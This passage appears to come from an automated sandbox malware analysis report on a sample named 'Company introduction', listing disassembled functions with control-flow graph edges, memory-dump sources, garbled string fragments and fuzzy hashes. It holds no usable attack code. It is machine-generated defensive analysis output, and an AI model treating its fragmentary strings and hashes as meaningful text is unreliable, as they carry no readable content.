                                                                                                                                                    control_flow_graph 146 17d6fc8-17d6ffe 147 17d7006-17d700c 146->147 290 17d7000 call 17d7118 146->290 291 17d7000 call 17d6fc8 146->291 292 17d7000 call 17d69a0 146->292 148 17d705c-17d7060 147->148 149 17d700e-17d7012 147->149 150 17d7077-17d708b 148->150 151 17d7062-17d7071 148->151 152 17d7014-17d7019 149->152 153 17d7021-17d7028 149->153 156 17d7093-17d709a 150->156 294 17d708d call 17da0e8 150->294 295 17d708d call 17d9de0 150->295 296 17d708d call 17d9dd0 150->296 154 17d709d-17d70a7 151->154 155 17d7073-17d7075 151->155 152->153 157 17d70fe-17d713b 153->157 158 17d702e-17d7035 153->158 159 17d70a9-17d70af 154->159 160 17d70b1-17d70b5 154->160 155->156 168 17d713d-17d7143 157->168 169 17d7146-17d7166 157->169 158->148 161 17d7037-17d703b 158->161 162 17d70bd-17d70f7 159->162 160->162 164 17d70b7 160->164 165 17d703d-17d7042 161->165 166 17d704a-17d7051 161->166 162->157 164->162 165->166 166->157 167 17d7057-17d705a 166->167 167->156 168->169 175 17d716d-17d7174 169->175 176 17d7168 169->176 177 17d7176-17d7181 175->177 178 17d74fc-17d7505 176->178 179 17d750d-17d7519 177->179 180 17d7187-17d719a 177->180 187 17d7598-17d759a 179->187 188 17d751b-17d7521 179->188 185 17d719c-17d71aa 180->185 186 17d71b0-17d71cb 180->186 185->186 199 17d7484-17d748b 185->199 201 17d71cd-17d71d3 186->201 202 17d71ef-17d71f2 186->202 191 17d759c-17d759e 187->191 192 17d75e4 187->192 189 17d75a0-17d75ab 188->189 190 17d7523-17d7549 188->190 189->192 207 17d75ad-17d75b3 189->207 197 17d754b-17d7550 190->197 198 17d7552-17d7556 190->198 191->189 196 17d75e9-17d75eb 192->196 204 17d755c-17d755d 197->204 198->204 199->178 203 17d748d-17d748f 199->203 208 17d71dc-17d71df 201->208 209 17d71d5 201->209 205 17d734c-17d7352 202->205 206 17d71f8-17d71fb 202->206 212 17d749e-17d74a4 203->212 213 17d7491-17d7496 203->213 210 17d743e-17d7441 205->210 215 17d7358-17d735d 205->215 206->205 216 17d7201-17d7207 206->216 217 17d75b5 207->217 218 17d75b7-17d75c3 207->218 211 17d7212-17d7218 208->211 214 17d71e1-17d71e4 208->214 209->205 209->208 209->210 209->211 223 17d7508 210->223 224 17d7447-17d744d 210->224 225 17d721e-17d7220 211->225 226 17d721a-17d721c 211->226 212->179 221 17d74a6-17d74ab 212->221 213->212 219 17d727e-17d7284 214->219 220 17d71ea 214->220 215->210 216->205 222 17d720d 216->222 227 17d75c5-17d75de 217->227 218->227 219->210 231 17d728a-17d7290 219->231 220->210 228 17d74ad-17d74b2 221->228 229 17d74f0-17d74f3 221->229 222->210 223->179 232 17d744f-17d7457 224->232 233 17d7472-17d7476 224->233 234 17d722a-17d7233 225->234 226->234 227->192 252 17d75e0-17d75e2 227->252 228->223 237 17d74b4 228->237 229->223 236 17d74f5-17d74fa 229->236 238 17d7296-17d7298 231->238 239 17d7292-17d7294 231->239 232->179 240 17d745d-17d746c 232->240 233->199 243 17d7478-17d747e 233->243 241 17d7235-17d7240 234->241 242 17d7246-17d726e 234->242 236->178 236->203 244 17d74bb-17d74c0 237->244 245 17d72a2-17d72b9 238->245 239->245 240->186 240->233 241->210 241->242 265 17d7274-17d7279 242->265 266 17d7362-17d7398 242->266 243->177 243->199 248 17d74e2-17d74e4 244->248 249 17d74c2-17d74c4 244->249 259 17d72bb-17d72d4 245->259 260 17d72e4-17d730b 245->260 248->223 256 17d74e6-17d74e9 248->256 253 17d74c6-17d74cb 249->253 254 17d74d3-17d74d9 249->254 252->196 253->254 254->179 258 17d74db-17d74e0 254->258 256->229 258->248 261 17d74b6-17d74b9 258->261 259->266 269 17d72da-17d72df 259->269 260->223 271 17d7311-17d7314 260->271 261->223 261->244 265->266 272 17d739a-17d739e 266->272 273 17d73a5-17d73ad 266->273 269->266 271->223 274 17d731a-17d7343 271->274 275 17d73bd-17d73c1 272->275 276 17d73a0-17d73a3 272->276 273->223 277 17d73b3-17d73b8 273->277 274->266 289 17d7345-17d734a 274->289 278 17d73e0-17d73e4 275->278 279 17d73c3-17d73c9 275->279 276->273 276->275 277->210 281 17d73ee-17d740d call 17d76f1 278->281 282 17d73e6-17d73ec 278->282 279->278 283 17d73cb-17d73d3 279->283 284 17d7413-17d7417 281->284 282->281 282->284 283->223 285 17d73d9-17d73de 283->285 284->210 287 17d7419-17d7435 284->287 285->210 287->210 289->266 290->147 291->147 292->147 294->156 295->156 296->156
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$(o^q$(o^q$,bq$,bq
                                                                                                                                                    • API String ID: 0-2525668591
                                                                                                                                                    • Opcode ID: 524545fdd08b3fa7068de3fb23205228b2af7d69711d06c39219fe4013a7fbe0
                                                                                                                                                    • Instruction ID: 5fb886143d32d5297ccd50ed662be5c88a4efcca5dc913a5f4c2cfd9ce170911
                                                                                                                                                    • Opcode Fuzzy Hash: 524545fdd08b3fa7068de3fb23205228b2af7d69711d06c39219fe4013a7fbe0
                                                                                                                                                    • Instruction Fuzzy Hash: 4E125F30A00259DFDB19CF69C884AAEFBF2BF48358F658469E905AB361D731DC41CB51
                                                                                                                                                    Function 017D9DE0 Relevance: 6.1, Strings: 4, Instructions: 1137COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$4'^q$4'^q$4'^q
                                                                                                                                                    • API String ID: 0-183542557
                                                                                                                                                    • Opcode ID: 76d0c89124112eaeec74bd465b876a5116c37c2bbc43889d8d46b97df1b09ee3
                                                                                                                                                    • Instruction ID: f66ffc577e5f080b3570aa212c0d90470d0dde2c502e990ce9331d3a8dc9f7b5
                                                                                                                                                    • Opcode Fuzzy Hash: 76d0c89124112eaeec74bd465b876a5116c37c2bbc43889d8d46b97df1b09ee3
                                                                                                                                                    • Instruction Fuzzy Hash: 2CA27D31A00209CFCB15CF68C984AAEFBB2FF88314F1985A9E505DB2A6D735ED41CB51
                                                                                                                                                    Function 05A89548 Relevance: 3.4, APIs: 2, Instructions: 357libraryCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1603 5a89548-5a89577 1604 5a89579 1603->1604 1605 5a8957e-5a89614 LdrInitializeThunk 1603->1605 1604->1605 1606 5a896b3-5a896b9 1605->1606 1607 5a89619-5a8962c 1606->1607 1608 5a896bf-5a896d7 1606->1608 1609 5a8962e 1607->1609 1610 5a89633-5a89684 1607->1610 1611 5a896d9-5a896e6 1608->1611 1612 5a896eb-5a896fe 1608->1612 1609->1610 1628 5a89686-5a89694 1610->1628 1629 5a89697-5a896a9 1610->1629 1613 5a89a81-5a89b7e 1611->1613 1614 5a89700 1612->1614 1615 5a89705-5a89721 1612->1615 1620 5a89b80-5a89b85 1613->1620 1621 5a89b86-5a89b90 1613->1621 1614->1615 1618 5a89728-5a8974c 1615->1618 1619 5a89723 1615->1619 1625 5a8974e 1618->1625 1626 5a89753-5a89785 1618->1626 1619->1618 1620->1621 1625->1626 1634 5a8978c-5a897ce 1626->1634 1635 5a89787 1626->1635 1628->1608 1631 5a896ab 1629->1631 1632 5a896b0 1629->1632 1631->1632 1632->1606 1637 5a897d0 1634->1637 1638 5a897d5-5a897de 1634->1638 1635->1634 1637->1638 1639 5a89a06-5a89a0c 1638->1639 1640 5a89a12-5a89a25 1639->1640 1641 5a897e3-5a89808 1639->1641 1644 5a89a2c-5a89a47 1640->1644 1645 5a89a27 1640->1645 1642 5a8980a 1641->1642 1643 5a8980f-5a89846 1641->1643 1642->1643 1653 5a89848 1643->1653 1654 5a8984d-5a8987f 1643->1654 1646 5a89a49 1644->1646 1647 5a89a4e-5a89a62 1644->1647 1645->1644 1646->1647 1651 5a89a69-5a89a7f LdrInitializeThunk 1647->1651 1652 5a89a64 1647->1652 1651->1613 1652->1651 1653->1654 1656 5a89881-5a898a6 1654->1656 1657 5a898e3-5a898f6 1654->1657 1658 5a898a8 1656->1658 1659 5a898ad-5a898db 1656->1659 1660 5a898f8 1657->1660 1661 5a898fd-5a89922 1657->1661 1658->1659 1659->1657 1660->1661 1664 5a89931-5a89969 1661->1664 1665 5a89924-5a89925 1661->1665 1666 5a8996b 1664->1666 1667 5a89970-5a899d1 call 5a89328 1664->1667 1665->1640 1666->1667 1673 5a899d8-5a899fc 1667->1673 1674 5a899d3 1667->1674 1677 5a899fe 1673->1677 1678 5a89a03 1673->1678 1674->1673 1677->1678 1678->1639
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2955296568.0000000005A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_5a80000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 0516938894b95ea053629be444366e1b66304cda05c7eb921a75e86980c4d003
                                                                                                                                                    • Instruction ID: 9edd3e503f1a7c34facf3e4a31950f5eee73243b43b0e348a680861b22efe886
                                                                                                                                                    • Opcode Fuzzy Hash: 0516938894b95ea053629be444366e1b66304cda05c7eb921a75e86980c4d003
                                                                                                                                                    • Instruction Fuzzy Hash: 41F1D574E01218DFDB14DFA9D884BAEBBB2BF88304F14C1A9E408AB355DB759985CF50
                                                                                                                                                    Function 017D69A0 Relevance: 3.0, Strings: 2, Instructions: 515COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (o^q$Hbq
                                                                                                                                                    • API String ID: 0-662517225
                                                                                                                                                    • Opcode ID: c026ba43334fa46191fca1f10a2aab7fc7ce9c62075e92511d6cec0ddd556ca3
                                                                                                                                                    • Instruction ID: 2c31312567d7d3691a310d11baaa8d54c099e566f191c471ba1272b571543f76
                                                                                                                                                    • Opcode Fuzzy Hash: c026ba43334fa46191fca1f10a2aab7fc7ce9c62075e92511d6cec0ddd556ca3
                                                                                                                                                    • Instruction Fuzzy Hash: 4F128E70A0021D8FDB19DF69C854AAEBBF6FF88304F148569E545EB395DB309D82CB90
                                                                                                                                                    Function 017D3B85 Relevance: 2.8, Strings: 2, Instructions: 268COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2247 17d3b85-17d3b8e 2248 17d3b91-17d3b94 2247->2248 2249 17d3b90 2247->2249 2250 17d3b99 2248->2250 2251 17d3b98 2248->2251 2249->2248 2252 17d3b9d-17d3be5 2250->2252 2253 17d3b9c 2250->2253 2251->2250 2251->2252 2254 17d3be9-17d3bee 2252->2254 2255 17d3be8 2252->2255 2253->2252 2256 17d3bf1 2254->2256 2257 17d3bf0 2254->2257 2255->2254 2258 17d3bf5 2256->2258 2259 17d3bf4 2256->2259 2257->2256 2257->2258 2260 17d3bf9 2258->2260 2261 17d3bf8 2258->2261 2259->2258 2259->2260 2262 17d3bfd 2260->2262 2263 17d3bfc 2260->2263 2261->2260 2261->2262 2264 17d3c01 2262->2264 2265 17d3c00 2262->2265 2263->2262 2263->2264 2266 17d3c05 2264->2266 2267 17d3c04 2264->2267 2265->2264 2265->2266 2268 17d3c09 2266->2268 2269 17d3c08 2266->2269 2267->2266 2267->2268 2270 17d3c0d 2268->2270 2271 17d3c0c 2268->2271 2269->2268 2269->2270 2272 17d3c11 2270->2272 2273 17d3c10 2270->2273 2271->2270 2271->2272 2274 17d3c15 2272->2274 2275 17d3c14 2272->2275 2273->2272 2273->2274 2276 17d3c19 2274->2276 2277 17d3c18 2274->2277 2275->2274 2275->2276 2278 17d3c1d 2276->2278 2279 17d3c1c 2276->2279 2277->2276 2277->2278 2280 17d3c21 2278->2280 2281 17d3c20 2278->2281 2279->2278 2279->2280 2282 17d3c25 2280->2282 2283 17d3c24 2280->2283 2281->2280 2281->2282 2284 17d3c29 2282->2284 2285 17d3c28 2282->2285 2283->2282 2283->2284 2286 17d3c2d 2284->2286 2287 17d3c2c 2284->2287 2285->2284 2285->2286 2288 17d3c31 2286->2288 2289 17d3c30 2286->2289 2287->2286 2287->2288 2290 17d3c35 2288->2290 2291 17d3c34 2288->2291 2289->2288 2289->2290 2292 17d3c39-17d3c3c 2290->2292 2293 17d3c38 2290->2293 2291->2290 2291->2292 2294 17d3c3d 2292->2294 2295 17d3c41-17d3c44 2292->2295 2293->2292 2294->2295 2296 17d3c40 2294->2296 2297 17d3c7b-17d3c7c 2295->2297 2298 17d3c45-17d3c46 2295->2298 2296->2295 2299 17d3c7d 2297->2299 2300 17d3c81-17d3ca4 2297->2300 2301 17d3c49-17d3c4a 2298->2301 2302 17d3c48 2298->2302 2299->2300 2303 17d3c7f-17d3c80 2299->2303 2312 17d3c69-17d3c6a 2300->2312 2313 17d3ca6-17d3cd9 2300->2313 2305 17d3c4d-17d3c4e 2301->2305 2306 17d3c4c 2301->2306 2302->2301 2303->2300 2308 17d3c51-17d3c52 2305->2308 2309 17d3c50 2305->2309 2306->2305 2310 17d3c55-17d3c56 2308->2310 2311 17d3c54 2308->2311 2309->2308 2314 17d3c59-17d3c5a 2310->2314 2315 17d3c58 2310->2315 2311->2310 2316 17d3c6d-17d3c6e 2312->2316 2317 17d3c6c 2312->2317 2327 17d3cdb-17d3cdd 2313->2327 2328 17d3cea-17d3cf2 2313->2328 2318 17d3c5d-17d3c5e 2314->2318 2319 17d3c5c 2314->2319 2315->2314 2321 17d3c71-17d3c72 2316->2321 2322 17d3c70 2316->2322 2317->2316 2325 17d3c61-17d3c62 2318->2325 2326 17d3c60 2318->2326 2319->2318 2323 17d3c75-17d3c76 2321->2323 2324 17d3c74 2321->2324 2322->2321 2331 17d3c79 2323->2331 2332 17d3c78 2323->2332 2324->2323 2333 17d3c65-17d3c66 2325->2333 2334 17d3c64 2325->2334 2326->2325 2329 17d3cdf-17d3ce1 2327->2329 2330 17d3ce3-17d3ce8 2327->2330 2335 17d3cf4-17d3d02 2328->2335 2329->2335 2330->2335 2331->2299 2337 17d3c7a 2331->2337 2332->2331 2333->2312 2338 17d3c68 2333->2338 2334->2333 2340 17d3d18-17d3d20 2335->2340 2341 17d3d04-17d3d06 2335->2341 2337->2297 2337->2299 2338->2312 2344 17d3d23-17d3d26 2340->2344 2342 17d3d0f-17d3d16 2341->2342 2343 17d3d08-17d3d0d 2341->2343 2342->2344 2343->2344 2346 17d3d3d-17d3d41 2344->2346 2347 17d3d28-17d3d36 2344->2347 2348 17d3d5a-17d3d5d 2346->2348 2349 17d3d43-17d3d51 2346->2349 2347->2346 2353 17d3d38 2347->2353 2351 17d3d5f-17d3d63 2348->2351 2352 17d3d65-17d3d9a 2348->2352 2349->2348 2358 17d3d53 2349->2358 2351->2352 2355 17d3d9c-17d3db3 2351->2355 2360 17d3dfc-17d3e01 2352->2360 2353->2346 2356 17d3db9-17d3dc5 2355->2356 2357 17d3db5-17d3db7 2355->2357 2361 17d3dcf-17d3dd9 2356->2361 2362 17d3dc7-17d3dcd 2356->2362 2357->2360 2358->2348 2363 17d3de1 2361->2363 2364 17d3ddb 2361->2364 2362->2363 2367 17d3de9-17d3df5 2363->2367 2364->2363 2367->2360
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Xbq$Xbq
                                                                                                                                                    • API String ID: 0-1243427068
                                                                                                                                                    • Opcode ID: 1cb13bdcf6a3c4ae84a5d19d4006d833f32f81c18e61a995807f8febcc70cd54
                                                                                                                                                    • Instruction ID: 73ffd8c1d62db7b3392dee4eccdf47c4267aef764d5c50c38f47e5dfd5a73d58
                                                                                                                                                    • Opcode Fuzzy Hash: 1cb13bdcf6a3c4ae84a5d19d4006d833f32f81c18e61a995807f8febcc70cd54
                                                                                                                                                    • Instruction Fuzzy Hash: A3814AEA605E9F47CF07863AA84C635FBF97B42160B84446AC44EDB2CBC925C843D753
                                                                                                                                                    Function 017D29EC Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2370 17d29ec-17d29f6 2372 17d29f8-17d2a01 2370->2372 2373 17d2981-17d298a 2370->2373 2374 17d2990 2372->2374 2375 17d2a03-17d2a0c 2372->2375 2373->2374 2378 17d2997 2374->2378 2376 17d2a0e-17d38b8 2375->2376 2377 17d2999 2375->2377 2481 17d38bd-17d38ca 2376->2481 2482 17d38bc 2376->2482 2379 17d29a0-17d29c8 2377->2379 2378->2377 2486 17d38cd-17d38d1 2481->2486 2487 17d38cc 2481->2487 2482->2481 2483 17d38ee-17d3962 2482->2483 2496 17d3965-17d3980 2483->2496 2497 17d3964 2483->2497 2486->2483 2487->2486 2497->2496
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Xbq$Xbq
                                                                                                                                                    • API String ID: 0-1243427068
                                                                                                                                                    • Opcode ID: 032aac4e5e48cd46215e2aa0bf2d74c6bd243bf618c911b1a27c7cbc98fe8c50
                                                                                                                                                    • Instruction ID: 9dcb8a70f98c3b668414657ff202e311bbf9617e1e59d596dbb4663950db7a87
                                                                                                                                                    • Opcode Fuzzy Hash: 032aac4e5e48cd46215e2aa0bf2d74c6bd243bf618c911b1a27c7cbc98fe8c50
                                                                                                                                                    • Instruction Fuzzy Hash: CC81ADEC548E8F8ACF438E38849D1B9FFFA7B42130B16819AD9549B11FD5298607C763
                                                                                                                                                    Function 017DC146 Relevance: 2.7, Strings: 2, Instructions: 227COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2580 17dc146-17dc158 2581 17dc15a-17dc172 2580->2581 2582 17dc184 2580->2582 2586 17dc17b-17dc17e 2581->2586 2587 17dc174-17dc179 2581->2587 2583 17dc186-17dc18a 2582->2583 2588 17dc18b-17dc199 2586->2588 2589 17dc180-17dc182 2586->2589 2587->2583 2591 17dc19d 2588->2591 2592 17dc19b 2588->2592 2589->2581 2589->2582 2593 17dc19f 2591->2593 2594 17dc1a1 2591->2594 2592->2591 2593->2594 2595 17dc1a5-17dc1c8 2594->2595 2596 17dc1a3 2594->2596 2597 17dc1cf-17dc2ac call 17d41a0 call 17d3cc0 2595->2597 2598 17dc1ca 2595->2598 2596->2595 2608 17dc2ae 2597->2608 2609 17dc2b3-17dc2d4 call 17d5658 2597->2609 2598->2597 2608->2609 2611 17dc2d9-17dc2e4 2609->2611 2612 17dc2eb-17dc2ef 2611->2612 2613 17dc2e6 2611->2613 2614 17dc2f4-17dc2fb 2612->2614 2615 17dc2f1-17dc2f2 2612->2615 2613->2612 2617 17dc2fd 2614->2617 2618 17dc302-17dc310 2614->2618 2616 17dc313-17dc357 2615->2616 2622 17dc3bd-17dc3d4 2616->2622 2617->2618 2618->2616 2624 17dc359-17dc36f 2622->2624 2625 17dc3d6-17dc3fb 2622->2625 2629 17dc399 2624->2629 2630 17dc371-17dc37d 2624->2630 2631 17dc3fd-17dc412 2625->2631 2632 17dc413 2625->2632 2635 17dc39f-17dc3bc 2629->2635 2633 17dc37f-17dc385 2630->2633 2634 17dc387-17dc38d 2630->2634 2631->2632 2636 17dc397 2633->2636 2634->2636 2635->2622 2636->2635
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 541fad26ebd33ca8e030f52c46f2d44e8b676bdab307563a03c3d3f57ee675a3
                                                                                                                                                    • Instruction ID: 701360afaf762144f40c99cf3649ec6575bffec01875bd3ced20a61a306e3417
                                                                                                                                                    • Opcode Fuzzy Hash: 541fad26ebd33ca8e030f52c46f2d44e8b676bdab307563a03c3d3f57ee675a3
                                                                                                                                                    • Instruction Fuzzy Hash: 1EA1D774E00218CFDB15CFAAD984A9DFBF2BF89310F1480A9E419AB365DB319945CF51
                                                                                                                                                    Function 017D5362 Relevance: 2.7, Strings: 2, Instructions: 195COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2640 17d5362-17d5364 2641 17d53c4-17d5484 call 17d41a0 call 17d3cc0 2640->2641 2642 17d5366-17d53a0 2640->2642 2654 17d548b-17d54a9 2641->2654 2655 17d5486 2641->2655 2643 17d53a7-17d53c2 2642->2643 2644 17d53a2 2642->2644 2643->2641 2644->2643 2685 17d54ac call 17d5649 2654->2685 2686 17d54ac call 17d5658 2654->2686 2655->2654 2656 17d54b2-17d54bd 2657 17d54bf 2656->2657 2658 17d54c4-17d54c8 2656->2658 2657->2658 2659 17d54cd-17d54d4 2658->2659 2660 17d54ca-17d54cb 2658->2660 2662 17d54db-17d54e9 2659->2662 2663 17d54d6 2659->2663 2661 17d54ec-17d5530 2660->2661 2667 17d5596-17d55ad 2661->2667 2662->2661 2663->2662 2669 17d55af-17d55d4 2667->2669 2670 17d5532-17d5548 2667->2670 2677 17d55ec 2669->2677 2678 17d55d6-17d55eb 2669->2678 2674 17d554a-17d5556 2670->2674 2675 17d5572 2670->2675 2679 17d5558-17d555e 2674->2679 2680 17d5560-17d5566 2674->2680 2676 17d5578-17d5595 2675->2676 2676->2667 2678->2677 2681 17d5570 2679->2681 2680->2681 2681->2676 2685->2656 2686->2656
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 021143614e930704b9e2716cfbb44b31b2b4b806189e17d4a19c00a210269572
                                                                                                                                                    • Instruction ID: 1ae8b5170247dc2a141cfbb3abca98d4efa29bc892e7b19bdc9778b0d51a972a
                                                                                                                                                    • Opcode Fuzzy Hash: 021143614e930704b9e2716cfbb44b31b2b4b806189e17d4a19c00a210269572
                                                                                                                                                    • Instruction Fuzzy Hash: 0591C574E00258CFDB19CFA9D984A9DFBF2BF89300F1480A9E419AB365DB349985CF51
                                                                                                                                                    Function 017DC468 Relevance: 2.7, Strings: 2, Instructions: 189COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2687 17dc468-17dc471 2688 17dc475-17dc498 2687->2688 2689 17dc473 2687->2689 2690 17dc49f-17dc57c call 17d41a0 call 17d3cc0 2688->2690 2691 17dc49a 2688->2691 2689->2688 2701 17dc57e 2690->2701 2702 17dc583-17dc5a4 call 17d5658 2690->2702 2691->2690 2701->2702 2704 17dc5a9-17dc5b4 2702->2704 2705 17dc5bb-17dc5bf 2704->2705 2706 17dc5b6 2704->2706 2707 17dc5c4-17dc5cb 2705->2707 2708 17dc5c1-17dc5c2 2705->2708 2706->2705 2710 17dc5cd 2707->2710 2711 17dc5d2-17dc5e0 2707->2711 2709 17dc5e3-17dc627 2708->2709 2715 17dc68d-17dc6a4 2709->2715 2710->2711 2711->2709 2717 17dc629-17dc63f 2715->2717 2718 17dc6a6-17dc6cb 2715->2718 2722 17dc669 2717->2722 2723 17dc641-17dc64d 2717->2723 2725 17dc6cd-17dc6e2 2718->2725 2726 17dc6e3 2718->2726 2724 17dc66f-17dc68c 2722->2724 2727 17dc64f-17dc655 2723->2727 2728 17dc657-17dc65d 2723->2728 2724->2715 2725->2726 2729 17dc667 2727->2729 2728->2729 2729->2724
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 3eba40fecbad92f7be9de301b23483e2da3e555c7a6f45b1b2c28cb80b534ff2
                                                                                                                                                    • Instruction ID: 4d1381e469fba45a0d6e9a075c7c8186984bf23733fc0e7bc57475ff0bab2d60
                                                                                                                                                    • Opcode Fuzzy Hash: 3eba40fecbad92f7be9de301b23483e2da3e555c7a6f45b1b2c28cb80b534ff2
                                                                                                                                                    • Instruction Fuzzy Hash: 3481C474E00218CFDB19DFAAD984A9DFBF2BF89300F149069E419AB365DB309985CF51
                                                                                                                                                    Function 017DD278 Relevance: 2.7, Strings: 2, Instructions: 188COMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 2733 17dd278-17dd2a8 2734 17dd2af-17dd38c call 17d41a0 call 17d3cc0 2733->2734 2735 17dd2aa 2733->2735 2745 17dd38e 2734->2745 2746 17dd393-17dd3b4 call 17d5658 2734->2746 2735->2734 2745->2746 2748 17dd3b9-17dd3c4 2746->2748 2749 17dd3cb-17dd3cf 2748->2749 2750 17dd3c6 2748->2750 2751 17dd3d4-17dd3db 2749->2751 2752 17dd3d1-17dd3d2 2749->2752 2750->2749 2754 17dd3dd 2751->2754 2755 17dd3e2-17dd3f0 2751->2755 2753 17dd3f3-17dd437 2752->2753 2759 17dd49d-17dd4b4 2753->2759 2754->2755 2755->2753 2761 17dd439-17dd44f 2759->2761 2762 17dd4b6-17dd4db 2759->2762 2766 17dd479 2761->2766 2767 17dd451-17dd45d 2761->2767 2768 17dd4dd-17dd4f2 2762->2768 2769 17dd4f3 2762->2769 2772 17dd47f-17dd49c 2766->2772 2770 17dd45f-17dd465 2767->2770 2771 17dd467-17dd46d 2767->2771 2768->2769 2773 17dd477 2770->2773 2771->2773 2772->2759 2773->2772
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2940249180.00000000017D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 017D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_17d0000_Company introduction.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: PH^q$PH^q
                                                                                                                                                    • API String ID: 0-1598597984
                                                                                                                                                    • Opcode ID: 8061feecf956320baed7264183743a359afb47274b7d26a92e2a7eabc6b77977
                                                                                                                                                    • Instruction ID: 9d7a437ae5ed7d9d8149126b496c2d660fac3c61e57b66d32e57ad4f87a19749
